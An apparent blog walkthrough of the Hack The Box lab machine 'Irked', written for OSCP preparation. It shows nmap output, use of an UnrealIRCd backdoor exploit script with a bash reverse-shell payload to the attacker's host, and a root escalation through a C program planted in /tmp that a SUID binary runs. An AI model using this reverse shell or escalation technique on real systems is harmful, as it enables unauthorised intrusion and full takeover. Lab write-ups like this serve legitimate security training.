TJ_Null’s OSCP prep – HTB – Irked
Another Linux box from TJ_nulls OSCP prep. This was was pretty interesting box with an attack vector I have not yet seen before. This is a pretty straight forward box, with no trickery. You can use metasploit to get initial access, but as I’ve stated earlier I will refrain from using metasploit.
Edit: After looking at IPPSEC’s walkthrough video I noticed that I missed some steps. Even though I got root access to this machine, there was a steg in the photo on the webserver. In djmardovs folders there was a .backup file with a hint pointing to steg. Djmardovs password was in the photo. You could now SSH in to his account.
Table Of Contents
Enumeration
I ran the usual NMAP scans. There were many open ports on this box, but the most interesing ports were 6697 and 8067 with the service IRC running on them.
┌─[root@parrotos]─[/home/aghanim/Desktop/HTB/irked]
└──╼ #nmap -sV -sC -A -p- --min-rate 10000 10.10.10.117 -oN nmap.result
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-03 20:48 GMT
Stats: 0:02:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 20:51 (0:00:00 remaining)
Warning: 10.10.10.117 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35586/tcp6 status
| 100024 1 44788/tcp status
| 100024 1 47670/udp status
|_ 100024 1 54828/udp6 status
2488/tcp filtered moy-corp
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
15636/tcp filtered unknown
16471/tcp filtered unknown
27107/tcp filtered unknown
44788/tcp open status 1 (RPC #100024)
47072/tcp filtered unknown
60340/tcp filtered unknown
65534/tcp open irc UnrealIRCd
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/3%OT=22%CT=1%CU=36187%PV=Y%DS=2%DC=T%G=Y%TM=61D3621E
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)SEQ(
OS:SP=107%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3
OS:=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7
OS:120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 38.30 ms 10.10.14.1
2 38.53 ms 10.10.10.117
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 228.62 seconds
A quick google search and I find that there is a backdoor vulnerability in UnrealIRCd which I can use to exploit and get initial access to the box.
Initial Access
To get initial access I will use Ranger11Danger’s python script. The payload in the script is
s.sendall((f'AB; {gen_payload(python_payload)} \n').encode())
which sends the character AB, the payload, and then a newline command. The payload here will be a reverse shell. bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1'
.
Start a netcat listener on your attacking machine and run the script with the command
python3 exploit.py -payload bash target_ip target_port
It didnt work the first couple of times, so I had to run it multiple times for it to work. I got shell with the user ircd.
I couldt read the user.txt since it was owned by another user named djmardov.
Root
Rooting this box was kinda similar to the box lame, with abusing files with SUID bits. Listing all the files with SUID bit using this command find / -type f -perm -04000 -ls 2>/dev/null
we get a list of files.
404330 356 -rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
394848 12 -rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
412270 16 -rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
410047 552 -rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
408970 16 -rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
409724 1060 -rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
424276 332 -rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd
394369 44 -rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
410065 96 -rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
394371 80 -rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
393000 40 -rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
409644 52 -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
412272 20 -rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
424835 12 -rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X
394373 52 -rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
394368 52 -rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
1062682 8 -rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
914060 96 -rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
783487 40 -rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
783401 36 -rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
792821 36 -rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
792836 160 -rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g
783402 28 -rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
The one file that struck out was viewuser, which is not a known binary. Taking a closer look at the binary we find that it is calling on a nother binary /tmp/listusers.
So in the tmp folder we create a listusers binary, which when we run /bin/viewuser will be called by the binary.
ircd@irked:/tmp$ cat listusers.c
int main(int argc, char **argv) {
setuid(0);
system("/bin/sh -i");
# The -i makes the shell interactive.
return 0;
}
ircd@irked:/tmp$ gcc listusers.c -o listusers
So what this binary does is setting our UID to 0 (root), the running the command /bin/sh with -i (interactive) parameter. We then compile it with gcc and run viewuser.
As you can see, we are now root and can read both the user.txt and root.txt. Interesting enough the password to djmardov‘s user was in the root directory.